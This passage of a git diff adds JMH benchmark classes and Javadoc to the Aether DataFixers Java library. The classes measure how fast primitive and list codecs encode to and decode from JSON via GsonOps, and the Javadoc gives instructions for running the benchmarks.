Measures the performance of converting a {@code List<String>} to a JSON array element. Each string element is individually encoded and added to the resulting array.

+ * + *

Performance factors:

+ *
    + *
• List iteration overhead
• Per-element string encoding cost
• JSON array construction and element addition
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void encodeStringList(final Blackhole blackhole) { + final DataResult result = this.stringListCodec.encodeStart(this.ops, this.stringList); + blackhole.consume(result); + } + + /** + * Benchmarks string list decoding from JSON array. + * + *

Measures the performance of extracting a {@code List<String>} from a pre-encoded JSON array. Each array element is decoded to a string and collected into the result list.

+ * + *

Performance factors:

+ *
    + *
• JSON array traversal
• Per-element string extraction
• Result list construction and population
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void decodeStringList(final Blackhole blackhole) { + final DataResult, JsonElement>> result = this.stringListCodec.decode(this.ops, this.encodedStringList); + blackhole.consume(result); + } + + // ==================== Integer List Benchmarks ==================== + + /** + * Benchmarks integer list encoding to JSON array. + * + *

Measures the performance of converting a {@code List<Integer>} to a JSON array element. Integer encoding is typically faster than string encoding due to simpler value representation.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void encodeIntList(final Blackhole blackhole) { + final DataResult result = this.intListCodec.encodeStart(this.ops, this.intList); + blackhole.consume(result); + } + + /** + * Benchmarks integer list decoding from JSON array. + * + *

Measures the performance of extracting a {@code List<Integer>} from a pre-encoded JSON array. Integer decoding involves numeric parsing from JSON number elements.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void decodeIntList(final Blackhole blackhole) { + final DataResult, JsonElement>> result = this.intListCodec.decode(this.ops, this.encodedIntList); + blackhole.consume(result); + } + + // ==================== Round-Trip Benchmarks (Direct Style) ==================== + + /** + * Benchmarks complete string list round-trip with direct result extraction. + * + *

Measures the combined performance of encoding a {@code List<String>} to JSON and immediately decoding it back. Uses {@code result().orElseThrow()} for direct value extraction, representing typical imperative usage patterns.

+ * + *

This benchmark is useful for scenarios where data is temporarily serialized (e.g., caching, message passing) and immediately deserialized.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void roundTripStringListDirect(final Blackhole blackhole) { + final JsonElement json = this.stringListCodec.encodeStart(this.ops, this.stringList) + .result().orElseThrow(); + final Pair, JsonElement> decoded = this.stringListCodec.decode(this.ops, json) + .result().orElseThrow(); + blackhole.consume(decoded); + } + + /** + * Benchmarks complete integer list round-trip with direct result extraction. + * + *

Measures the combined performance of encoding a {@code List<Integer>} to JSON and immediately decoding it back using direct value extraction.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void roundTripIntListDirect(final Blackhole blackhole) { + final JsonElement json = this.intListCodec.encodeStart(this.ops, this.intList) + .result().orElseThrow(); + final Pair, JsonElement> decoded = this.intListCodec.decode(this.ops, json) + .result().orElseThrow(); + blackhole.consume(decoded); + } + + // ==================== Round-Trip Benchmarks (Functional Style) ==================== + + /** + * Benchmarks complete string list round-trip using functional API. + * + *

Measures the combined performance of encoding and decoding using {@link DataResult#flatMap} for monadic composition. This represents the functional programming style where operations are chained without explicit result unwrapping.

+ * + *

Comparing with {@link #roundTripStringListDirect} reveals the overhead (if any) of the functional API approach versus direct extraction.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void roundTripStringListFunctional(final Blackhole blackhole) { + final DataResult encoded = this.stringListCodec.encodeStart(this.ops, this.stringList); + final DataResult, JsonElement>> decoded = encoded.flatMap( + json -> this.stringListCodec.decode(this.ops, json) + ); + blackhole.consume(decoded); + } + + /** + * Benchmarks complete integer list round-trip using functional API. + * + *

Measures the combined performance of encoding and decoding using monadic composition via {@link DataResult#flatMap}.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void roundTripIntListFunctional(final Blackhole blackhole) { + final DataResult encoded = this.intListCodec.encodeStart(this.ops, this.intList); + final DataResult, JsonElement>> decoded = encoded.flatMap( + json -> this.intListCodec.decode(this.ops, json) + ); + blackhole.consume(decoded); + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java new file mode 100644 index 0000000..7e9c8da --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java @@ -0,0 +1,467 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.codec; + +import com.google.gson.JsonElement; +import de.splatgames.aether.datafixers.api.codec.Codecs; +import de.splatgames.aether.datafixers.api.result.DataResult; +import de.splatgames.aether.datafixers.api.util.Pair; +import de.splatgames.aether.datafixers.codec.json.gson.GsonOps; +import org.openjdk.jmh.annotations.Benchmark; +import org.openjdk.jmh.annotations.BenchmarkMode; +import org.openjdk.jmh.annotations.Fork; +import org.openjdk.jmh.annotations.Level; +import org.openjdk.jmh.annotations.Measurement; +import org.openjdk.jmh.annotations.Mode; +import org.openjdk.jmh.annotations.OutputTimeUnit; +import org.openjdk.jmh.annotations.Scope; +import org.openjdk.jmh.annotations.Setup; +import org.openjdk.jmh.annotations.State; +import org.openjdk.jmh.annotations.Warmup; +import org.openjdk.jmh.infra.Blackhole; + +import java.util.concurrent.TimeUnit; + +/** + * JMH benchmark for primitive type codec encode/decode performance. + * + *

Measures the baseline performance of the fundamental codec operations for primitive Java types. These benchmarks establish the lower bound for codec performance and help identify overhead introduced by more complex codec compositions.

+ * + *

Benchmark Categories

+ * + *

Encode Benchmarks

+ *

Measure Java value to JSON element conversion:

+ *
    + *
• {@link #encodeBool} - Boolean encoding
• {@link #encodeInt} - Integer encoding
• {@link #encodeLong} - Long encoding
• {@link #encodeFloat} - Float encoding
• {@link #encodeDouble} - Double encoding
• {@link #encodeString} - String encoding
+ * + *

Decode Benchmarks

+ *

Measure JSON element to Java value conversion:

+ *
    + *
• {@link #decodeBool} - Boolean decoding
• {@link #decodeInt} - Integer decoding
• {@link #decodeLong} - Long decoding
• {@link #decodeFloat} - Float decoding
• {@link #decodeDouble} - Double decoding
• {@link #decodeString} - String decoding
+ * + *

Round-Trip Benchmarks

+ *

Measure complete encode-then-decode cycles:

+ *
    + *
• {@link #roundTripIntDirect} - Integer round-trip with direct result extraction
• {@link #roundTripStringDirect} - String round-trip with direct result extraction
+ * + *

Benchmark Configuration

+ * + * + * + * + * + * + * + *
Setting     | Value
Warmup      | 5 iterations, 1 second each
Measurement | 10 iterations, 1 second each
Forks       | 2 (for JIT variance mitigation)
JVM Heap    | 2 GB min/max
Time Unit   | Nanoseconds (for fine-grained primitive ops)
+ * + *

Test Values

+ * + * + * + * + * + * + * + * + *
Type    | Value                           | Notes
boolean | {@code true}                    | Single bit representation
int     | {@code 42}                      | Small positive integer
long    | {@code 123456789L}              | Nine-digit value exercising the long-specific codec path
float   | {@code 3.14159f}                | Pi approximation (tests decimal handling)
double  | {@code 2.718281828}             | Euler's number (tests precision)
String  | {@code "benchmark-test-string"} | 21-character ASCII string
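A compact sketch of the round-trip these values flow through, mirroring {@link #roundTripIntDirect} below:

{@code
final JsonElement json = Codecs.INT.encodeStart(GsonOps.INSTANCE, 42).result().orElseThrow();
final Pair<Integer, JsonElement> decoded = Codecs.INT.decode(GsonOps.INSTANCE, json).result().orElseThrow();
}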
+ * + *

Interpreting Results

+ *
    + *
• Encode vs Decode: Encoding typically allocates new JSON elements; decoding extracts values from existing elements. Similar performance is expected.
• Numeric types: All numeric types should have similar performance as they map directly to JSON number primitives.
• String codec: May show slightly different characteristics due to string interning and character encoding considerations.
• Round-trip overhead: Should be approximately encode + decode time plus minimal DataResult unwrapping overhead.
+ * + *

Usage

+ *
{@code
+ * # Run all primitive codec benchmarks
+ * java -jar benchmarks.jar PrimitiveCodecBenchmark
+ *
+ * # Run only encode benchmarks
+ * java -jar benchmarks.jar "PrimitiveCodecBenchmark.encode.*"
+ *
+ * # Run only decode benchmarks
+ * java -jar benchmarks.jar "PrimitiveCodecBenchmark.decode.*"
+ *
+ * # Compare specific types
+ * java -jar benchmarks.jar "PrimitiveCodecBenchmark.*(Int|Long).*"
+ *
+ * # Quick validation run
+ * java -jar benchmarks.jar PrimitiveCodecBenchmark -wi 1 -i 1 -f 1
+ *
+ * # Generate CSV for spreadsheet analysis
+ * java -jar benchmarks.jar PrimitiveCodecBenchmark -rf csv -rff primitive_results.csv
+ * }
+ * + * @author Erik Pförtner + * @see CollectionCodecBenchmark + * @see de.splatgames.aether.datafixers.api.codec.Codecs + * @see de.splatgames.aether.datafixers.codec.json.gson.GsonOps + * @since 1.0.0 + */ +@BenchmarkMode({Mode.Throughput, Mode.AverageTime}) +@OutputTimeUnit(TimeUnit.NANOSECONDS) +@State(Scope.Benchmark) +@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS) +@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS) +@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"}) +public class PrimitiveCodecBenchmark { + + /** + * Test boolean value for encoding benchmarks. + */ + private static final boolean TEST_BOOL = true; + + /** + * Test integer value for encoding benchmarks. + * + *

A small positive integer that fits in a single JSON number token.

+ */ + private static final int TEST_INT = 42; + + /** + * Test long value for encoding benchmarks. + * + *

A nine-digit value used to exercise the long-specific codec path.

+ */ + private static final long TEST_LONG = 123456789L; + + /** + * Test float value for encoding benchmarks. + * + *

Pi approximation to test decimal point handling and precision.

+ */ + private static final float TEST_FLOAT = 3.14159f; + + /** + * Test double value for encoding benchmarks. + * + *

Euler's number with extended precision to test double encoding accuracy.

+ */ + private static final double TEST_DOUBLE = 2.718281828; + + /** + * Test string value for encoding benchmarks. + * + *

A 21-character ASCII string representing typical field values.

+ */ + private static final String TEST_STRING = "benchmark-test-string"; + + /** + * The DynamicOps implementation used for all codec operations. + * + *

GsonOps is used as the reference implementation for JSON format benchmarks.

+ */ + private GsonOps ops; + + /** + * Pre-encoded boolean JSON element for decode benchmarks. + */ + private JsonElement encodedBool; + + /** + * Pre-encoded integer JSON element for decode benchmarks. + */ + private JsonElement encodedInt; + + /** + * Pre-encoded long JSON element for decode benchmarks. + */ + private JsonElement encodedLong; + + /** + * Pre-encoded float JSON element for decode benchmarks. + */ + private JsonElement encodedFloat; + + /** + * Pre-encoded double JSON element for decode benchmarks. + */ + private JsonElement encodedDouble; + + /** + * Pre-encoded string JSON element for decode benchmarks. + */ + private JsonElement encodedString; + + /** + * Initializes pre-encoded JSON elements for decode benchmarks. + * + *

Pre-encoding ensures decode benchmarks measure only decoding performance without encoding overhead. All test values are encoded once at trial start.

+ */ + @Setup(Level.Trial) + public void setup() { + this.ops = GsonOps.INSTANCE; + + this.encodedBool = Codecs.BOOL.encodeStart(this.ops, TEST_BOOL).result().orElseThrow(); + this.encodedInt = Codecs.INT.encodeStart(this.ops, TEST_INT).result().orElseThrow(); + this.encodedLong = Codecs.LONG.encodeStart(this.ops, TEST_LONG).result().orElseThrow(); + this.encodedFloat = Codecs.FLOAT.encodeStart(this.ops, TEST_FLOAT).result().orElseThrow(); + this.encodedDouble = Codecs.DOUBLE.encodeStart(this.ops, TEST_DOUBLE).result().orElseThrow(); + this.encodedString = Codecs.STRING.encodeStart(this.ops, TEST_STRING).result().orElseThrow(); + } + + // ==================== Boolean Benchmarks ==================== + + /** + * Benchmarks boolean value encoding to JSON. + * + *

Measures the performance of converting a Java {@code boolean} to a JSON boolean element via {@link Codecs#BOOL}.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void encodeBool(final Blackhole blackhole) { + final DataResult result = Codecs.BOOL.encodeStart(this.ops, TEST_BOOL); + blackhole.consume(result); + } + + /** + * Benchmarks boolean value decoding from JSON. + * + *

Measures the performance of extracting a Java {@code Boolean} from a pre-encoded JSON boolean element.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void decodeBool(final Blackhole blackhole) { + final DataResult> result = Codecs.BOOL.decode(this.ops, this.encodedBool); + blackhole.consume(result); + } + + // ==================== Integer Benchmarks ==================== + + /** + * Benchmarks integer value encoding to JSON. + * + *

Measures the performance of converting a Java {@code int} to a JSON number element via {@link Codecs#INT}.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void encodeInt(final Blackhole blackhole) { + final DataResult result = Codecs.INT.encodeStart(this.ops, TEST_INT); + blackhole.consume(result); + } + + /** + * Benchmarks integer value decoding from JSON. + * + *

Measures the performance of extracting a Java {@code Integer} from a pre-encoded JSON number element.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void decodeInt(final Blackhole blackhole) { + final DataResult> result = Codecs.INT.decode(this.ops, this.encodedInt); + blackhole.consume(result); + } + + // ==================== Long Benchmarks ==================== + + /** + * Benchmarks long value encoding to JSON. + * + *

Measures the performance of converting a Java {@code long} to a JSON number element via {@link Codecs#LONG}.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void encodeLong(final Blackhole blackhole) { + final DataResult result = Codecs.LONG.encodeStart(this.ops, TEST_LONG); + blackhole.consume(result); + } + + /** + * Benchmarks long value decoding from JSON. + * + *

Measures the performance of extracting a Java {@code Long} from a pre-encoded JSON number element.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void decodeLong(final Blackhole blackhole) { + final DataResult> result = Codecs.LONG.decode(this.ops, this.encodedLong); + blackhole.consume(result); + } + + // ==================== Float Benchmarks ==================== + + /** + * Benchmarks float value encoding to JSON. + * + *

Measures the performance of converting a Java {@code float} to a JSON number element via {@link Codecs#FLOAT}. Float encoding involves decimal representation which may differ from integer encoding.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void encodeFloat(final Blackhole blackhole) { + final DataResult result = Codecs.FLOAT.encodeStart(this.ops, TEST_FLOAT); + blackhole.consume(result); + } + + /** + * Benchmarks float value decoding from JSON. + * + *

Measures the performance of extracting a Java {@code Float} from a pre-encoded JSON number element. Decoding involves parsing the decimal representation back to IEEE 754 single-precision format.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void decodeFloat(final Blackhole blackhole) { + final DataResult> result = Codecs.FLOAT.decode(this.ops, this.encodedFloat); + blackhole.consume(result); + } + + // ==================== Double Benchmarks ==================== + + /** + * Benchmarks double value encoding to JSON. + * + *

Measures the performance of converting a Java {@code double} to a JSON number element via {@link Codecs#DOUBLE}. Double encoding preserves higher precision than float but uses similar mechanisms.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void encodeDouble(final Blackhole blackhole) { + final DataResult result = Codecs.DOUBLE.encodeStart(this.ops, TEST_DOUBLE); + blackhole.consume(result); + } + + /** + * Benchmarks double value decoding from JSON. + * + *

Measures the performance of extracting a Java {@code Double} from a pre-encoded JSON number element.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void decodeDouble(final Blackhole blackhole) { + final DataResult> result = Codecs.DOUBLE.decode(this.ops, this.encodedDouble); + blackhole.consume(result); + } + + // ==================== String Benchmarks ==================== + + /** + * Benchmarks string value encoding to JSON. + * + *

Measures the performance of converting a Java {@code String} to a JSON string element via {@link Codecs#STRING}. String encoding may involve escape sequence handling for special characters.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void encodeString(final Blackhole blackhole) { + final DataResult result = Codecs.STRING.encodeStart(this.ops, TEST_STRING); + blackhole.consume(result); + } + + /** + * Benchmarks string value decoding from JSON. + * + *

Measures the performance of extracting a Java {@code String} from a pre-encoded JSON string element.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void decodeString(final Blackhole blackhole) { + final DataResult> result = Codecs.STRING.decode(this.ops, this.encodedString); + blackhole.consume(result); + } + + // ==================== Round-Trip Benchmarks ==================== + + /** + * Benchmarks complete integer round-trip (encode then decode). + * + *

Measures the combined performance of encoding a Java {@code int} to JSON and immediately decoding it back. Uses direct result extraction via {@code result().orElseThrow()} to measure the typical non-functional usage pattern.

+ * + *

Round-trip performance is important for scenarios where data is temporarily serialized (e.g., caching, IPC) and immediately deserialized.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void roundTripIntDirect(final Blackhole blackhole) { + final JsonElement json = Codecs.INT.encodeStart(this.ops, TEST_INT).result().orElseThrow(); + final Pair decoded = Codecs.INT.decode(this.ops, json).result().orElseThrow(); + blackhole.consume(decoded); + } + + /** + * Benchmarks complete string round-trip (encode then decode). + * + *

Measures the combined performance of encoding a Java {@code String} to JSON and immediately decoding it back. String round-trips may involve additional overhead from string object creation compared to primitive numeric types.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void roundTripStringDirect(final Blackhole blackhole) { + final JsonElement json = Codecs.STRING.encodeStart(this.ops, TEST_STRING).result().orElseThrow(); + final Pair decoded = Codecs.STRING.decode(this.ops, json).result().orElseThrow(); + blackhole.consume(decoded); + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/package-info.java new file mode 100644 index 0000000..5720cfc --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/package-info.java @@ -0,0 +1,163 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +/** + * Codec-focused JMH benchmarks for the Aether DataFixers framework. + * + *

This package contains benchmarks that measure the performance of codec operations, including encoding (Java objects to serialized format) and decoding (serialized format to Java objects). These benchmarks establish baseline performance for the codec system and help identify bottlenecks in serialization pipelines.

+ * + *

Benchmark Classes

+ * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + *
Class                                                                              | Focus Area                                                      | Key Metrics
{@link de.splatgames.aether.datafixers.benchmarks.codec.PrimitiveCodecBenchmark}  | Primitive type codecs (bool, int, long, float, double, string) | Baseline encode/decode latency, round-trip overhead
{@link de.splatgames.aether.datafixers.benchmarks.codec.CollectionCodecBenchmark} | Collection codecs (List<String>, List<Integer>)                | Scaling with collection size, functional vs direct API overhead
+ * + *

Why Codec Benchmarks?

+ *

Codecs are fundamental to the DataFixer system, transforming data between typed Java objects and format-agnostic {@link de.splatgames.aether.datafixers.api.dynamic.Dynamic} representations. Understanding codec performance is essential for:

+ *
    + *
• Baseline establishment: Primitive codecs set the lower bound for all codec operations; complex codecs compose these primitives
• Bottleneck identification: Comparing encode vs decode reveals which direction is more expensive for a given type
• Scaling analysis: Collection benchmarks show how performance changes with data volume
• API comparison: Direct extraction vs functional composition may have different performance characteristics (see the sketch after this list)
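The API-comparison point is easiest to see side by side; both forms appear verbatim in the round-trip benchmarks:

{@code
// direct style: unwrap each DataResult immediately
final JsonElement json = Codecs.STRING.encodeStart(GsonOps.INSTANCE, "x").result().orElseThrow();
final Pair<String, JsonElement> direct = Codecs.STRING.decode(GsonOps.INSTANCE, json).result().orElseThrow();

// functional style: stay inside DataResult and compose with flatMap
final DataResult<Pair<String, JsonElement>> functional =
        Codecs.STRING.encodeStart(GsonOps.INSTANCE, "x")
                .flatMap(j -> Codecs.STRING.decode(GsonOps.INSTANCE, j));
}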
  • + *
+ * + *

Running Codec Benchmarks

+ *
{@code
+ * # Run all codec benchmarks
+ * java -jar benchmarks.jar ".*codec.*"
+ *
+ * # Run only primitive codec benchmarks
+ * java -jar benchmarks.jar PrimitiveCodecBenchmark
+ *
+ * # Run only collection codec benchmarks
+ * java -jar benchmarks.jar CollectionCodecBenchmark
+ *
+ * # Run encode-only benchmarks across all codec types
+ * java -jar benchmarks.jar ".*codec.*encode.*"
+ *
+ * # Run decode-only benchmarks
+ * java -jar benchmarks.jar ".*codec.*decode.*"
+ *
+ * # Run round-trip benchmarks
+ * java -jar benchmarks.jar ".*codec.*roundTrip.*"
+ *
+ * # Quick validation with reduced iterations
+ * java -jar benchmarks.jar ".*codec.*" -wi 1 -i 1 -f 1
+ *
+ * # Generate CSV report for analysis
+ * java -jar benchmarks.jar ".*codec.*" -rf csv -rff codec_results.csv
+ * }
+ * + *

Benchmark Design Principles

+ *
    + *
• Isolated operations: Encode and decode are benchmarked separately to identify which direction is more expensive
• Pre-encoded data: Decode benchmarks use pre-encoded JSON elements created during setup to avoid measuring encoding overhead
• Parameterization: Collection sizes are parameterized to reveal scaling characteristics
• API styles: Both direct extraction ({@code result().orElseThrow()}) and functional composition ({@code flatMap}) are benchmarked for round-trips
• Time units: Nanoseconds for primitives (sub-microsecond operations), microseconds for collections (longer operations)
+ * + *

Interpreting Codec Results

+ * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + *
Observation                       | Meaning                                                   | Action
Encode slower than decode         | JSON element construction more expensive than extraction  | Consider caching encoded results if reused
Decode slower than encode         | Type parsing/validation overhead dominates                | Review type conversion logic
Super-linear collection scaling   | GC pressure or algorithmic inefficiency                   | Profile memory allocation; consider streaming
Functional API slower than direct | Lambda/closure overhead measurable                        | Use direct extraction for hot paths
String codec slower than numeric  | String allocation/interning overhead                      | Expected; no action needed
+ * + *

Relationship to Other Benchmarks

+ *

Codec benchmarks complement other benchmark packages:

+ *
    + *
• {@link de.splatgames.aether.datafixers.benchmarks.core core} - Uses codecs internally; codec performance affects fix application time
• {@link de.splatgames.aether.datafixers.benchmarks.concurrent concurrent} - Codec thread-safety is assumed; concurrent benchmarks validate this assumption
+ * + *

+ * <h2>Supported Serialization Formats</h2>
+ *
+ * <p>These benchmarks use {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps}
+ * as the reference DynamicOps implementation. The codec system supports multiple formats:</p>
+ *
+ * <ul>
+ *   <li><b>JSON:</b> GsonOps, JacksonJsonOps</li>
+ *   <li><b>YAML:</b> SnakeYamlOps, JacksonYamlOps</li>
+ *   <li><b>TOML:</b> JacksonTomlOps</li>
+ *   <li><b>XML:</b> JacksonXmlOps</li>
+ * </ul>
+ *
+ * <p>Future benchmarks may compare performance across different DynamicOps implementations.</p>
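+ *
+ * <p>Conceptually, such a comparison would only swap the DynamicOps handle passed
+ * to the data generator. A minimal sketch: only {@code GsonOps.INSTANCE} is
+ * confirmed by the benchmarks in this module; the other {@code INSTANCE}
+ * accessors are assumed to follow the same convention.</p>
+ *
+ * <pre>{@code
+ * // Confirmed usage: generate benchmark data against the Gson backend
+ * Dynamic<JsonElement> json =
+ *         BenchmarkDataGenerator.generate(GsonOps.INSTANCE, PayloadSize.SMALL);
+ *
+ * // Hypothetical equivalents for other backends:
+ * // BenchmarkDataGenerator.generate(SnakeYamlOps.INSTANCE, PayloadSize.SMALL);
+ * // BenchmarkDataGenerator.generate(JacksonTomlOps.INSTANCE, PayloadSize.SMALL);
+ * }</pre>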

+ * + * @see de.splatgames.aether.datafixers.benchmarks.codec.PrimitiveCodecBenchmark + * @see de.splatgames.aether.datafixers.benchmarks.codec.CollectionCodecBenchmark + * @see de.splatgames.aether.datafixers.api.codec.Codec + * @see de.splatgames.aether.datafixers.api.codec.Codecs + * @see de.splatgames.aether.datafixers.codec.json.gson.GsonOps + * @since 1.0.0 + */ +package de.splatgames.aether.datafixers.benchmarks.codec; diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java new file mode 100644 index 0000000..a1830bf --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java @@ -0,0 +1,601 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. 
+ */ + +package de.splatgames.aether.datafixers.benchmarks.concurrent; + +import com.google.gson.JsonElement; +import de.splatgames.aether.datafixers.api.DataVersion; +import de.splatgames.aether.datafixers.api.dynamic.Dynamic; +import de.splatgames.aether.datafixers.api.fix.DataFixer; +import de.splatgames.aether.datafixers.api.schema.Schema; +import de.splatgames.aether.datafixers.api.schema.SchemaRegistry; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator; +import de.splatgames.aether.datafixers.benchmarks.util.PayloadSize; +import de.splatgames.aether.datafixers.codec.json.gson.GsonOps; +import de.splatgames.aether.datafixers.core.schema.SimpleSchemaRegistry; +import de.splatgames.aether.datafixers.testkit.factory.MockSchemas; +import org.openjdk.jmh.annotations.Benchmark; +import org.openjdk.jmh.annotations.BenchmarkMode; +import org.openjdk.jmh.annotations.Fork; +import org.openjdk.jmh.annotations.Level; +import org.openjdk.jmh.annotations.Measurement; +import org.openjdk.jmh.annotations.Mode; +import org.openjdk.jmh.annotations.OutputTimeUnit; +import org.openjdk.jmh.annotations.Param; +import org.openjdk.jmh.annotations.Scope; +import org.openjdk.jmh.annotations.Setup; +import org.openjdk.jmh.annotations.State; +import org.openjdk.jmh.annotations.Threads; +import org.openjdk.jmh.annotations.Warmup; +import org.openjdk.jmh.infra.Blackhole; + +import java.util.SplittableRandom; +import java.util.concurrent.TimeUnit; + +/** + * JMH benchmark for concurrent DataFixer operations and thread-safety validation. + * + *

+ * <p>This benchmark measures the performance characteristics of the DataFixer system
+ * under concurrent load. It validates thread-safety of shared components and quantifies
+ * scalability across different thread counts. The results help identify contention
+ * points and ensure the framework performs well in multi-threaded environments.</p>
+ *
+ * <h2>Benchmark Categories</h2>

+ * <h3>Concurrent Migration Benchmarks</h3>
+ *
+ * <p>Measure DataFixer performance when multiple threads perform migrations simultaneously:</p>
+ *
+ * <ul>
+ *   <li>{@link #concurrentSingleFix} - Maximum parallelism with single-fix migrations</li>
+ *   <li>{@link #concurrentChainMigration} - Maximum parallelism with 10-fix chain migrations</li>
+ *   <li>{@link #fourThreadMigration} - Fixed 4-thread migration for baseline comparison</li>
+ *   <li>{@link #eightThreadMigration} - Fixed 8-thread migration for scaling analysis</li>
+ * </ul>

+ * <h3>Concurrent Registry Access Benchmarks</h3>
+ *
+ * <p>Measure SchemaRegistry performance under concurrent read pressure:</p>
+ *
+ * <ul>
+ *   <li>{@link #concurrentRegistryLookup} - Random version lookups from multiple threads</li>
+ *   <li>{@link #concurrentLatestLookup} - Latest schema lookups (hot path optimization)</li>
+ * </ul>

+ * <h2>Thread Configuration</h2>
+ *
+ * <table>
